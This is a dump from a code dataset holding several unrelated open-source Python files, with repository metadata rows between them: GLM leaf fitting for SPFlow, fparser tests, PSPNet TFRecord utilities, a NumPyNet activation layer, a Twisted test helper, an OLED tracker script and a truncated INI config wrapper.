    # No-op `.format(args["vendor_id"])` calls removed; output is unchanged.
    return jsonify(response)
| 27.775641 | 75 | 0.632587 | 0 | 0 | 0 | 0 | 2,995 | 0.691207 | 0 | 0 | 954 | 0.220171 |
338d8b38b7ae2a594d977bc4df33b494659dacc1 | 2,896 | py | Python | src/spn/structure/leaves/conditional/MLE.py | kripa-experiments/SPFlow | 32eada604bf5442d8aa10223581b187f7a57d540 | [
"Apache-2.0"
] | null | null | null | src/spn/structure/leaves/conditional/MLE.py | kripa-experiments/SPFlow | 32eada604bf5442d8aa10223581b187f7a57d540 | [
"Apache-2.0"
] | null | null | null | src/spn/structure/leaves/conditional/MLE.py | kripa-experiments/SPFlow | 32eada604bf5442d8aa10223581b187f7a57d540 | [
"Apache-2.0"
] | null | null | null | '''
Created on April 15, 2018
@author: Alejandro Molina
'''
import numpy as np
import warnings
from scipy.stats import gamma, lognorm
from sklearn.linear_model import ElasticNet
from spn.structure.leaves.conditional.Conditional import Conditional_Gaussian, Conditional_Poisson, \
Conditional_Bernoulli
import statsmodels.api as sm
from os.path import dirname
path = dirname(__file__) + "/"
def update_glm_parameters_mle(node, data, scope):
    """Fit a GLM for a conditional leaf node by (regularized) MLE.

    ``data`` holds the output column(s) first, then the conditioning
    columns (despite the old inline note, the slicing below shows it is a
    single 2-D array, not a tuple).  ``scope`` must name exactly one output
    variable.  On success the fitted coefficients — including the intercept
    column appended here — are stored on ``node.weights``.
    """
    assert len(scope) == 1, 'more than one output variable in scope?'
    # NOTE(review): this mask-and-reshape only succeeds when `data` contains
    # no NaNs at all; otherwise the flattened selection cannot be reshaped
    # back to `data.shape` — confirm upstream guarantees.
    data = data[~np.isnan(data)].reshape(data.shape)
    dataOut = data[:, :len(scope)]
    dataIn = data[:, len(scope):]
    assert dataOut.shape[1] == 1, 'more than one output variable in scope?'
    if dataOut.shape[0] == 0:
        # Nothing to fit on an empty slice; leave the node's weights alone.
        return
    # Append a constant column so the GLM learns an intercept term.
    dataIn = np.c_[dataIn, np.ones((dataIn.shape[0]))]
    if isinstance(node, Conditional_Gaussian):
        # Gaussian leaves: try a fast ElasticNet fit first; fall through to
        # statsmodels only if it fails to converge within max_iter.
        reg = ElasticNet(random_state=0, alpha=0.01, max_iter=2000, fit_intercept=False)
        reg.fit(dataIn, dataOut)
        if reg.n_iter_ < reg.max_iter:
            node.weights = reg.coef_.tolist()
            return
        family = sm.families.Gaussian()
    elif isinstance(node, Conditional_Poisson):
        family = sm.families.Poisson()
    elif isinstance(node, Conditional_Bernoulli):
        family = sm.families.Binomial()
    else:
        raise Exception("Unknown conditional " + str(type(node)))
    glmfit = sm.GLM(dataOut, dataIn, family=family).fit_regularized(alpha=0.0001, maxiter=5)
    node.weights = glmfit.params.tolist()
    return
    # NOTE(review): everything below this unconditional `return` is
    # unreachable, experimental TensorFlow-Probability code left in place;
    # consider deleting it.
    try:
        import tensorflow as tf
        import tensorflow_probability as tfp;
        tfd = tfp.distributions
        dataOut = dataOut.reshape(-1)
        w, linear_response, is_converged, num_iter = tfp.glm.fit(
            model_matrix=tf.constant(dataIn),
            response=tf.constant(dataOut),
            model=tfp.glm.Poisson(),
            l2_regularizer=0.0001)
        log_likelihood = tfp.glm.Poisson().log_prob(tf.constant(dataOut), linear_response)
        with tf.Session() as sess:
            [w_, linear_response_, is_converged_, num_iter_, Y_, log_likelihood_] = sess.run(
                [w, linear_response, is_converged, num_iter, tf.constant(dataOut), log_likelihood])
        node.weights = w_
        print("node.weights", node.weights)
        # glmfit = sm.GLM(dataOut, dataIn, family=family).fit_regularized(alpha=0.001)
        # node.weights = glmfit.params
        # # if glmfit.converged is False:
        # # warnings.warn("Maximum number of iterations reached")
    except Exception:
        glmfit = sm.GLM(dataOut, dataIn, family=family).fit_regularized(alpha=0.0001)
        node.weights = glmfit.params
        print("node.weights with glmfit", node.weights)
    np.savez(path + "tmp_glm_mle_data", dataIn=dataIn, dataOut=dataOut)
| 34.891566 | 113 | 0.667472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 489 | 0.168854 |
338eac6a7e1d38c11cb457c1d528a675949db378 | 5,077 | py | Python | src/fparser/two/tests/fortran2003/test_control_edit_descriptor_r1011.py | sturmianseq/fparser | bf3cba3f31a72671d4d4a93b6ef4f9832006219f | [
"BSD-3-Clause"
] | 33 | 2017-08-18T16:31:27.000Z | 2022-03-28T09:43:50.000Z | src/fparser/two/tests/fortran2003/test_control_edit_descriptor_r1011.py | sturmianseq/fparser | bf3cba3f31a72671d4d4a93b6ef4f9832006219f | [
"BSD-3-Clause"
] | 319 | 2017-01-12T14:22:07.000Z | 2022-03-23T20:53:25.000Z | src/fparser/two/tests/fortran2003/test_control_edit_descriptor_r1011.py | sturmianseq/fparser | bf3cba3f31a72671d4d4a93b6ef4f9832006219f | [
"BSD-3-Clause"
] | 17 | 2017-10-13T07:12:28.000Z | 2022-02-11T14:42:18.000Z | # Copyright (c) 2019 Science and Technology Facilities Council
# All rights reserved.
# Modifications made as part of the fparser project are distributed
# under the following license:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Tests for a Fortran 2003 R1011 control edit descriptor.'''
import pytest
from fparser.two.Fortran2003 import Control_Edit_Desc
from fparser.two.utils import NoMatchError, InternalError
def test_descriptors_match(f2003_create):
    '''Valid control edit descriptors handled directly by the match method
    ('/', ':' and 'P', with optional repeat counts and surrounding spaces)
    parse correctly.  '$' is covered separately as it is an extension.
    '''
    samples = ("/", " / ", "2/", " 2 / ", ":", " : ", "2P", " 2 P ",
               "2p", " 2 p ")
    for sample in samples:
        result = Control_Edit_Desc(sample)
        expected = sample.upper().replace(" ", "")
        assert str(result) == expected
def test_descriptors_subclass(f2003_create):
    '''Descriptors delegated to subclasses are forwarded correctly; one
    representative value per subclass suffices, as the subclass tests
    cover the full option space.
    '''
    for sample in ("T2", "SS", "BN", "RU", "DC"):
        result = Control_Edit_Desc(sample)
        assert str(result) == sample.upper()
def test_dollar_valid(f2003_create, monkeypatch):
    '''With the dollar-descriptor extension enabled, '$' format
    specifications (with or without spaces) parse correctly.
    '''
    from fparser.two import utils
    monkeypatch.setattr(utils, "EXTENSIONS", ["dollar-descriptor"])
    for sample in ("$", " $ "):
        result = Control_Edit_Desc(sample)
        assert str(result) == sample.upper().replace(" ", "")
def test_dollar_invalid(f2003_create, monkeypatch):
    '''Without the dollar-descriptor extension in EXTENSIONS, '$' format
    specifications must raise NoMatchError.
    '''
    from fparser.two import utils
    monkeypatch.setattr(utils, "EXTENSIONS", [])
    for sample in ("$", " $ "):
        with pytest.raises(NoMatchError):
            _ = Control_Edit_Desc(sample)
def test_invalid_format_errors(f2003_create):
    '''Inputs that are not valid control edit descriptors must raise
    NoMatchError from the match method.
    '''
    bad_inputs = (None, "", " ", "//", "a /", "/ a", "::", "a :",
                  ": a", "pp", "a p", "p a")
    for bad in bad_inputs:
        with pytest.raises(NoMatchError):
            _ = Control_Edit_Desc(bad)
def test_internal_error1(f2003_create, monkeypatch):
    '''str() assumes the items list has exactly 2 entries; patching in a
    3-entry list must raise InternalError.
    '''
    ast = Control_Edit_Desc("3P")
    monkeypatch.setattr(ast, "items", [None, None, None])
    with pytest.raises(InternalError) as excinfo:
        str(ast)
    assert "has '3' items, but expecting 2." in str(excinfo.value)
def test_internal_error2(f2003_create, monkeypatch):
    '''str() assumes the descriptor name (second items entry) is a
    non-empty string; both None and "" must raise InternalError.
    '''
    ast = Control_Edit_Desc("3P")
    for bad_name in (None, ""):
        monkeypatch.setattr(ast, "items", [ast.items[0], bad_name])
        with pytest.raises(InternalError) as excinfo:
            str(ast)
        assert "should be an edit descriptor name but is empty or None" \
            in str(excinfo.value)
| 39.053846 | 74 | 0.696868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,235 | 0.637187 |
338f8fbc58d791841bc38c5b6a72926e9899414e | 6,486 | py | Python | PSPNet/utils.py | keyme/deep_learning | 1d08a739d889cf736e75b87cc30ec0476c3dec6d | [
"MIT"
] | 12 | 2018-03-14T18:06:16.000Z | 2020-07-21T12:06:53.000Z | PSPNet/utils.py | keyme/deep_learning | 1d08a739d889cf736e75b87cc30ec0476c3dec6d | [
"MIT"
] | 10 | 2018-02-26T21:18:15.000Z | 2019-01-25T17:16:20.000Z | PSPNet/utils.py | keyme/deep_learning | 1d08a739d889cf736e75b87cc30ec0476c3dec6d | [
"MIT"
] | 7 | 2018-02-26T19:23:00.000Z | 2019-03-11T01:21:54.000Z | """
This module contains utility functions used in the conversion of the downloaded
data to TFrecords as well as functions used by the model/training script.
Semantic segmenation evaluations methods were taken from
https://github.com/martinkersner/py_img_seg_eval
"""
import os
import fnmatch
import logging
import cv2
import numpy as np
from PIL import Image
from tqdm import tqdm
import tensorflow as tf
def set_logging_verbosity(verbose_level=3):
    """Configure root logging from an int 0 (critical only) to 4 (debug).

    Raises TypeError for non-int input and ValueError for out-of-range
    values.
    """
    if not isinstance(verbose_level, int):
        raise TypeError("verbose_level must be an int")
    if not (0 <= verbose_level <= 4):
        raise ValueError("verbose_level must be between 0 and 4")
    # Index 0 is the quietest level, index 4 the noisiest.
    levels = (logging.CRITICAL,
              logging.ERROR,
              logging.WARNING,
              logging.INFO,
              logging.DEBUG)
    logging.basicConfig(
        format='%(asctime)s:\t %(message)s',
        datefmt='%m/%d/%Y %I:%M:%S %p',
        level=levels[verbose_level])
def compute_batch_pixel_accuracy(predicted_masks, ground_truth_masks):
    """
    Mean pixel accuracy over a batch: each predicted mask is squeezed and
    scored (via ``pixel_accuracy``) against the ground-truth mask at the
    same index, and the per-image accuracies are averaged.
    """
    scores = [
        pixel_accuracy(np.squeeze(predicted_masks[idx]),
                       np.squeeze(ground_truth_masks[idx]))
        for idx in range(len(predicted_masks))
    ]
    return np.mean(scores)
def load_data_paths(data_root_directory, extra_ignore_regexes=None):
    """
    Lazily yield the paths of image files found anywhere under
    ``data_root_directory`` — all ``.png`` files first, then all ``.jpg``.
    Only path strings are yielded; no image data is loaded.

    NOTE(review): ``extra_ignore_regexes`` is accepted but currently
    unused — confirm whether filtering was ever wired up.
    """
    root_path = os.path.realpath(data_root_directory)
    # os.walk + fnmatch (rather than glob) keeps Python 2 compatibility.
    for extension in ('.png', '.jpg'):
        pattern = '*' + extension
        for dir_path, _dirnames, files in os.walk(root_path):
            for file_name in fnmatch.filter(files, pattern):
                yield os.path.join(dir_path, file_name)
def _bytes_feature(value):
    """Wrap a byte string in a tf.train.Feature (BytesList of length 1)."""
    wrapped = tf.train.BytesList(value=[value])
    return tf.train.Feature(bytes_list=wrapped)
def _int64_feature(value):
    """Wrap a scalar int in a tf.train.Feature (Int64List of length 1)."""
    wrapped = tf.train.Int64List(value=[value])
    return tf.train.Feature(int64_list=wrapped)
def build_semseg_record(images_to_masks, tfrecords_filename, resize_dims):
    """Serialize a {image_path: mask_path} mapping into one TFRecords file.

    Each example stores the pre-resize image dimensions, the target
    ``resize_dims`` (interpreted as (height, width) — it is reversed for
    cv2.resize, which expects (width, height)), and the raw bytes of the
    resized image and mask.
    """
    writer = tf.python_io.TFRecordWriter(tfrecords_filename)
    for image_path, mask_path in tqdm(images_to_masks.items()):
        image = cv2.imread(image_path)
        mask = cv2.imread(mask_path, 0)  # single-channel class-id mask
        # Fixed: capture the ORIGINAL dimensions before resizing.  They were
        # previously read after the resize, so 'original_height'/'original_width'
        # just duplicated the resized dimensions.
        h, w, _ = image.shape
        mask = cv2.resize(mask, resize_dims[::-1], interpolation=cv2.INTER_AREA)
        image = cv2.resize(image, resize_dims[::-1], interpolation=cv2.INTER_AREA)
        # Add axis for QueueRunners
        mask = np.expand_dims(mask, axis=-1)
        # convert the image and mask to their raw bytes repr
        mask_raw = mask.tostring()
        image_raw = image.tostring()
        # Encode one example at a time
        example = tf.train.Example(features=tf.train.Features(feature={
            'original_height': _int64_feature(h),
            'original_width': _int64_feature(w),
            'resized_height': _int64_feature(resize_dims[0]),
            'resized_width': _int64_feature(resize_dims[1]),
            'image_raw': _bytes_feature(image_raw),
            'mask_raw': _bytes_feature(mask_raw)}))
        writer.write(example.SerializeToString())
    writer.close()
def symbolic_read_and_decode_semseg_tfrecord(
        filename_queue, resize_dims, batch_size, num_threads, min_after_dequeue):
    """
    Build symbolic (image, mask) batch tensors from a semantic-segmentation
    TFRecord file whose feature keys match those written by
    ``build_semseg_record``, adding the reader, decoder and shuffle-queue
    ops to the current graph (TF 1.x queue-runner API).
    """
    reader = tf.TFRecordReader()
    _, serialized_example = reader.read(filename_queue)
    # Feature schema must mirror what build_semseg_record serialized.
    features = tf.parse_single_example(
        serialized_example,
        features={
            'original_height': tf.FixedLenFeature([], tf.int64),
            'original_width': tf.FixedLenFeature([], tf.int64),
            'resized_height': tf.FixedLenFeature([], tf.int64),
            'resized_width': tf.FixedLenFeature([], tf.int64),
            'image_raw': tf.FixedLenFeature([], tf.string),
            'mask_raw': tf.FixedLenFeature([], tf.string)})
    # Decode the image/mask back from bytes to uint8
    image = tf.decode_raw(features['image_raw'], tf.uint8)
    mask = tf.decode_raw(features['mask_raw'], tf.uint8)
    # Restore spatial shape: 3-channel image, 1-channel mask.
    image = tf.reshape(image, (*resize_dims, 3))
    mask = tf.reshape(mask, (*resize_dims, 1))
    # Use capacity formula recommended by tensorflow
    capacity = min_after_dequeue + (num_threads + 1) * batch_size
    # Add queue/shuffling related ops to the graph
    image_batch, mask_batch= tf.train.shuffle_batch(
        [image, mask], batch_size=batch_size, capacity=capacity,
        num_threads=num_threads, min_after_dequeue=min_after_dequeue)
    return image_batch, mask_batch
def build_tfrecords_batch(*paths_to_tfrecords, image_shape, batch_size, max_iterations, min_after_dequeue=100):
    """Build (image, label) batch tensors from one or more TFRecord files."""
    filename_queue = tf.train.string_input_producer(
        list(paths_to_tfrecords), num_epochs=max_iterations)
    # Delegate reader/decoder/shuffle-queue construction; returns the
    # (image_batch, label_batch) pair unchanged.
    return symbolic_read_and_decode_semseg_tfrecord(
        filename_queue, image_shape, batch_size=batch_size,
        num_threads=4, min_after_dequeue=min_after_dequeue)
def add_color(img, num_classes=32):
    """Expand a single-channel class-id map into an RGB float image.

    Categories 1..150 receive a hue-spaced colour from ``to_color``; pixels
    equal to ``num_classes`` are then painted white, overriding that one
    category's hue.  NOTE(review): the loop bound is fixed at 150 and
    ignores ``num_classes`` — confirm this is intentional.
    """
    height, width = img.shape
    colored = np.zeros((height, width, 3))
    for category in range(1, 151):
        colored[img == category] = to_color(category)
    colored[img == num_classes] = (1.0, 1.0, 1.0)
    return colored
def to_color(category):
    """Return an RGB tuple for a category, hues spaced ~137.5 deg apart."""
    import colorsys
    # Golden-angle-style spacing keeps neighbouring category colours distinct.
    hue = (category - 1) * (137.5 / 360)
    return colorsys.hsv_to_rgb(hue, 1, 1)
| 35.442623 | 111 | 0.68301 | 0 | 0 | 828 | 0.12766 | 0 | 0 | 0 | 0 | 1,985 | 0.306044 |
3390381ad2adf5630233e515d79350ddfc4af053 | 5,685 | py | Python | NumPyNet/layers/activation_layer.py | Nico-Curti/NumPyNet | bc4153f58a054d4e60bb14c993bf61a058458e8b | [
"MIT"
] | 28 | 2019-08-19T15:46:12.000Z | 2022-02-17T16:32:13.000Z | NumPyNet/layers/activation_layer.py | Nico-Curti/NumPyNet | bc4153f58a054d4e60bb14c993bf61a058458e8b | [
"MIT"
] | 3 | 2020-07-05T17:16:44.000Z | 2022-03-28T10:03:36.000Z | NumPyNet/layers/activation_layer.py | Nico-Curti/NumPyNet | bc4153f58a054d4e60bb14c993bf61a058458e8b | [
"MIT"
] | 7 | 2019-09-17T09:13:57.000Z | 2022-02-15T08:50:38.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from NumPyNet.activations import Activations
from NumPyNet.utils import _check_activation
from NumPyNet.utils import check_is_fitted
import numpy as np
from NumPyNet.layers.base import BaseLayer
__author__ = ['Mattia Ceccarelli', 'Nico Curti']
__email__ = ['mattia.ceccarelli3@studio.unibo.it', 'nico.curti2@unibo.it']
class Activation_layer(BaseLayer):

  '''
  Element-wise activation layer.

  Applies the chosen activation function in the forward pass and scales the
  back-propagated error by the activation gradient in the backward pass.
  The output shape equals the input shape.

  Parameters
  ----------
  input_shape : tuple (default=None)
    Input dimensions as a tuple of 4 integers (batch, width, height, channels).
  activation : str or Activations object
    Activation function applied inside the layer.
  '''

  def __init__(self, input_shape=None, activation=Activations, **kwargs):

    # Resolve string names / classes into a concrete Activations object.
    act_fun = _check_activation(self, activation)

    self.activation = act_fun.activate
    self.gradient = act_fun.gradient

    super(Activation_layer, self).__init__(input_shape=input_shape)

  def __str__(self):
    '''
    Printer: input and output shapes are identical for this layer.
    '''
    b, w, h, c = self.out_shape
    return 'activ {0:>4d} x{1:>4d} x{2:>4d} x{3:>4d} -> {0:>4d} x{1:>4d} x{2:>4d} x{3:>4d}'.format(b, w, h, c)

  def forward(self, inpt, copy=True):
    '''
    Apply the selected activation function to the input and reset the
    stored delta buffer.

    Parameters
    ----------
    inpt : array-like
      Input array to activate.
    copy : bool (default=True)
      If True, copy the input before applying the activation.

    Returns
    -------
    self
    '''
    self._check_dims(shape=self.out_shape, arr=inpt, func='Forward')

    self.output = self.activation(inpt, copy=copy)
    # Fresh delta buffer for the subsequent backward pass.
    self.delta = np.zeros(self.out_shape, dtype=float)

    return self

  def backward(self, delta, copy=False):
    '''
    Scale the stored delta by the activation gradient evaluated on the
    stored output, then write the result into the caller's buffer.

    Parameters
    ----------
    delta : array-like
      Global error to be backpropagated; overwritten in place.

    Returns
    -------
    self
    '''
    check_is_fitted(self, 'delta')
    self._check_dims(shape=self.out_shape, arr=delta, func='Backward')

    self.delta *= self.gradient(self.output, copy=copy)
    delta[:] = self.delta

    return self
if __name__ == '__main__':
  # Visual demo: push a sample image through a Hardtan activation layer and
  # plot the input, the forward output, and the backward delta.
  import os
  import pylab as plt
  from PIL import Image
  from NumPyNet import activations
  activation_func = activations.Hardtan()
  # Helpers to rescale images into [0, 1] floats and back to uint8 [0, 255].
  img_2_float = lambda im : ((im - im.min()) * (1./(im.max() - im.min()) * 1.)).astype(float)
  float_2_img = lambda im : ((im - im.min()) * (1./(im.max() - im.min()) * 255.)).astype(np.uint8)
  filename = os.path.join(os.path.dirname(__file__), '..', '..', 'data', 'dog.jpg')
  inpt = np.asarray(Image.open(filename), dtype=float)
  inpt.setflags(write=1)
  inpt = img_2_float(inpt)
  # rescale pixels into [-1, 1] (Hardtan saturates outside that range)
  inpt = inpt * 2 - 1
  # add batch = 1
  inpt = np.expand_dims(inpt, axis=0)
  layer = Activation_layer(input_shape=inpt.shape, activation=activation_func)
  # FORWARD
  layer.forward(inpt)
  forward_out = layer.output
  print(layer)
  # BACKWARD: seed the layer delta with ones and collect the result in `delta`
  layer.delta = np.ones(shape=inpt.shape, dtype=float)
  delta = np.zeros(shape=inpt.shape, dtype=float)
  layer.backward(delta, copy=True)
  # Visualizations
  fig, (ax1, ax2, ax3) = plt.subplots(nrows=1, ncols=3, figsize=(10, 5))
  fig.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.15)
  fig.suptitle('Activation Layer\nfunction : {}'.format(activation_func.name))
  ax1.imshow(float_2_img(inpt[0]))
  ax1.set_title('Original image')
  ax1.axis('off')
  ax2.imshow(float_2_img(forward_out[0]))
  ax2.set_title("Forward")
  ax2.axis("off")
  ax3.imshow(float_2_img(delta[0]))
  ax3.set_title('Backward')
  ax3.axis('off')
  fig.tight_layout()
  plt.show()
| 25.840909 | 119 | 0.63131 | 3,730 | 0.656113 | 0 | 0 | 0 | 0 | 0 | 0 | 3,099 | 0.545119 |
339039daaf7ffa710ba3dbd6f69316cd722f2b38 | 843 | py | Python | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | 39 | 2015-04-09T12:55:25.000Z | 2022-01-09T17:56:39.000Z | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | null | null | null | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | 13 | 2015-12-17T21:56:26.000Z | 2019-06-01T18:22:02.000Z | import unittest
from twisted.internet import reactor, task
class ReactorTestCase(unittest.TestCase):
    """Base TestCase for tests that drive the Twisted reactor.

    Subclasses schedule work on the reactor, assert from callbacks via
    reactorAssert(), and finish with reactorTestComplete();
    timeOutAfter() guards against tests that never complete.
    """

    def __init__(self, *args, **kwargs):
        super(ReactorTestCase, self).__init__(*args, **kwargs)
        # True once the test has finished (completed or timed out).
        self.done = False

    def timeOutAfter(self, seconds):
        """Schedule timedOut() to fire `seconds` from now.

        Fix: reactor.callLater() already schedules the one-shot call and
        returns an IDelayedCall, which has no start() method (start()
        belongs to twisted.internet.task.LoopingCall), so the original
        `f.start(seconds)` raised AttributeError.
        """
        reactor.callLater(seconds, self.timedOut)

    def timedOut(self):
        """Timeout handler: report, stop the reactor, then fail the test."""
        self.done = True
        print("Test Timed Out!")
        if reactor.running:
            reactor.stop()
        # Fail last: assertTrue(False, ...) raises immediately, so in the
        # original the print and reactor.stop() after it were unreachable.
        self.assertTrue(False, "test timed out!")

    def reactorAssert(self, success, msg):
        """Assert only while the test is still running (no-op after done)."""
        if not self.done:
            self.assertTrue(success, msg)

    def reactorTestComplete(self):
        """Mark the test finished and stop the reactor."""
        self.done = True
        self.assertTrue(True, "test complete!")
        print("Test Complete!")
        if reactor.running:
            reactor.stop()
| 28.1 | 62 | 0.619217 | 782 | 0.927639 | 0 | 0 | 0 | 0 | 0 | 0 | 66 | 0.078292 |
3390fdfb284aecfe0fd47351543fe7cd80e19246 | 1,068 | py | Python | old/accurate_landing.py | domnantas/landing-system | 408f352ce56d83ec63882e0aee370df5f5d683ad | [
"MIT"
] | 1 | 2021-09-15T08:06:03.000Z | 2021-09-15T08:06:03.000Z | old/accurate_landing.py | domnantas/landing-system | 408f352ce56d83ec63882e0aee370df5f5d683ad | [
"MIT"
] | null | null | null | old/accurate_landing.py | domnantas/landing-system | 408f352ce56d83ec63882e0aee370df5f5d683ad | [
"MIT"
] | null | null | null | from oled import TrackerOled
from color_tracker import ColorTracker
import cv2
from threading import Thread
# Hardware/vision helpers: OLED display wrapper and colour tracker.
tracker_oled = TrackerOled()
color_tracker = ColorTracker()
def write_fps():
    """Show the tracker's current FPS on the OLED (unused; see commented-out thread below)."""
    tracker_oled.writeTextCenter("FPS: {:.2f}".format(color_tracker.fps.fps()))
tracker_oled.writeTextCenter("READY")
while True:
    color_tracker.processFrame()
    # t = Thread(target=write_fps, args=(), daemon=True)
    # t.start()
    (frame_height, frame_width, frame_channels) = color_tracker.frame.shape
    if color_tracker.center is not None:
        # Scale the tracked point from camera coordinates to OLED coordinates.
        (point_x, point_y) = color_tracker.center
        draw_x = int(round(point_x * tracker_oled.oled.width / frame_width))
        draw_y = int(round(point_y * tracker_oled.oled.height / frame_height))
        tracker_oled.drawPoint(draw_x, draw_y)
    # else:
    #     tracker_oled.writeTextCenter("NOT FOUND")
    key = cv2.waitKey(1) & 0xFF
    # if the 'q' key is pressed, stop the loop
    if key == ord("q"):
        color_tracker.release()
        # Bug fix: the original called out.release(), but no `out` (e.g. a
        # cv2.VideoWriter) is ever created in this script, so pressing 'q'
        # raised NameError instead of shutting down cleanly.
        tracker_oled.clearDisplay()
        break
| 30.514286 | 79 | 0.690075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 182 | 0.170412 |
3393b84012cd8093cec6722d84c146ceb9736287 | 6,692 | py | Python | lightconfig/lightconfig.py | daassh/LightConfig | e7d962bafae47e635b8a14abe8f6f98cb3ea16a9 | [
"MIT"
] | 2 | 2018-07-24T02:16:41.000Z | 2018-08-06T06:52:15.000Z | lightconfig/lightconfig.py | daassh/LightConfig | e7d962bafae47e635b8a14abe8f6f98cb3ea16a9 | [
"MIT"
] | null | null | null | lightconfig/lightconfig.py | daassh/LightConfig | e7d962bafae47e635b8a14abe8f6f98cb3ea16a9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
# get a easy way to edit config file
"""
>>> from lightconfig import LightConfig
>>> cfg = LightConfig("config.ini")
>>> cfg.section1.option1 = "value1"
>>> print(cfg.section1.option1)
value1
>>> "section1" in cfg
True
>>> "option1" in cfg.section1
True
"""
import os
import codecs
import locale
try:
from ConfigParser import RawConfigParser as ConfigParser
except ImportError:
from configparser import RawConfigParser as ConfigParser
class ConfigParserOptionCaseSensitive(ConfigParser):
    """RawConfigParser variant that keeps option names case sensitive.

    The stock parser lower-cases every option name through optionxform();
    overriding it with the identity preserves the caller's exact spelling.
    (The original's pass-through __init__ added nothing beyond the inherited
    constructor -- same signature, same default -- and is omitted.)
    """

    def optionxform(self, option_str):
        # Identity transform: return the option name unchanged.
        return option_str
class LightConfig(object):
    """Attribute/dict-style wrapper around an INI file that writes through to disk.

    ``cfg.section.option = value`` creates the section/option and saves the
    file immediately; reads re-parse the file when its mtime has changed.
    Internal state lives in ``self.__dict__[...]`` directly because
    ``__setattr__``/``__getattr__`` are hijacked for section access.
    """
    # NOTE(review): the mutable default set for try_encoding is shared across
    # calls, but it is only read here, so this is harmless in practice.
    def __init__(self, config_path, try_encoding={'utf-8', 'utf-8-sig', locale.getpreferredencoding().lower()}, try_convert_digit = False):
        self.__dict__['_config_path'] = config_path
        self.__dict__['_try_encoding'] = try_encoding if isinstance(try_encoding, (list, tuple, set)) else [try_encoding]
        self.__dict__['_try_convert_digit'] = try_convert_digit
        self.__dict__['_config'] = ConfigParserOptionCaseSensitive()
        # Create the file (and its parent directory) on first use.
        if not os.path.exists(config_path):
            dir_path = os.path.dirname(os.path.abspath(config_path))
            if not os.path.exists(dir_path):
                os.makedirs(dir_path)
            open(config_path, 'a').close()
        LightConfig._read(self)
        self.__dict__['_cached_stamp'] = LightConfig._stamp(self)
    def __str__(self):
        return str(LightConfig._as_dict(self))
    def __repr__(self):
        return repr(LightConfig._as_dict(self))
    def __iter__(self):
        return iter(LightConfig._as_dict(self).items())
    # Only 'keys' and '__dict__' resolve normally; any other attribute name
    # is treated as a config section via __getattr__.
    def __getattribute__(self, item):
        if item in ('keys', '__dict__'):
            return super(LightConfig, self).__getattribute__(item)
        else:
            return LightConfig.__getattr__(self, item)
    def __getattr__(self, item):
        return LightConfig.Section(self, item, self.__dict__['_try_convert_digit'])
    __getitem__ = __getattr__
    # Assigning a mapping to a section name replaces that section wholesale.
    def __setattr__(self, name, value):
        try:
            value = dict(value)
        except:
            raise ValueError('"{}" is not dictable'.format(value))
        else:
            LightConfig.__dict__['__delattr__'](self, name)
            section = LightConfig.Section(self, name, self.__dict__['_try_convert_digit'])
            for k, v in value.items():
                LightConfig.Section.__setattr__(section, k, v)
    __setitem__ = __setattr__
    def __delattr__(self, item):
        if item in self:
            self.__dict__['_config'].remove_section(item)
            LightConfig._save(self)
    __delitem__ = __delattr__
    def __contains__(self, item):
        return self.__dict__['_config'].has_section(item)
    def _as_dict(self):
        # Snapshot of the whole file as {section: {option: value}}.
        res = {}
        for section in self.keys():
            res[section] = self[section]
        return res
    def keys(self):
        return self.__dict__['_config'].sections()
    def _read(self):
        # Try each candidate encoding until one parses cleanly.
        for encoding in self.__dict__['_try_encoding']:
            fp = codecs.open(self.__dict__['_config_path'], encoding=encoding)
            try:
                if 'read_file' in dir(self.__dict__['_config']):
                    self.__dict__['_config'].read_file(fp)
                else:
                    self.__dict__['_config'].readfp(fp)
            except:
                err = True
            else:
                err = False
                self.__dict__['_encoding'] = encoding
                break
        if err:
            raise UnicodeError("\"{}\" codec can't decode this config file".format(', '.join(self.__dict__['_try_encoding'])))
    def _save(self):
        self.__dict__['_config'].write(codecs.open(self.__dict__['_config_path'], "w", encoding=self.__dict__['_encoding']))
        self.__dict__['_cached_stamp'] = LightConfig._stamp(self)
    def _stamp(self):
        # File mtime, used to detect out-of-band edits.
        return os.stat(self.__dict__['_config_path']).st_mtime
    class Section(object):
        """Proxy for one INI section; attribute access maps to options."""
        def __init__(self, conf, section, try_convert_digit):
            self.__dict__['_section'] = section
            self.__dict__['_conf'] = conf
            self.__dict__['_try_convert_digit'] = try_convert_digit
        def __str__(self):
